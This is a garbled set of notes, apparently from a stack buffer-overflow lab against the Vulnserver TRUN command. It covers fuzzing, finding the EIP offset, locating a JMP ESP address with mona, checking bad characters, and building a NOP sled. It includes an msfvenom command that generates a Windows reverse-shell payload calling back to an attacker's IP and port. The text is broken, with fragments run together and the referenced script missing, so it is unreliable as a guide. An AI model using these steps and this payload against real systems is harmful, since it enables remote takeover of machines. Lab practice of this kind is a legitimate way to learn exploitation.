generic_send_tcp
^ send a TCP request with our characters and test it Now we create a file {something}.spk and put this in there:generic_send_tcp {ip} {port} file.spk 0 0
TRUN command appears to be vulnerable/usr/share/metasploit-framework/exploit/pattern_create.rb
Command used:offset
with the characters and remove the while
loop (offset is buffer in the old script) Script should look like this:+ badchars
to shellcode
C:\ProgramFiles(x86)\ImmunityInc\ImmunityDebugger\PyCommands
Type !mona modules
in the ImmunityDebugger/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
We want to convert Assembly code to Hex Type command JMP ESP
-> take FFE4!mona modules
to !mona find -s "\xff\xe4" -m essfunc.dll
badchars
-> Change "B" *4 to "\xaf\x11\x50\x62"
msfvenom -p windows/shell_reverse_tcp LHOST={OUR IP} LPORT={OUR PORT} EXITFUNC=thread -f c -a x86 -b "\x00"
+ overflow
+ "\x90" * 32
before the `+overflow+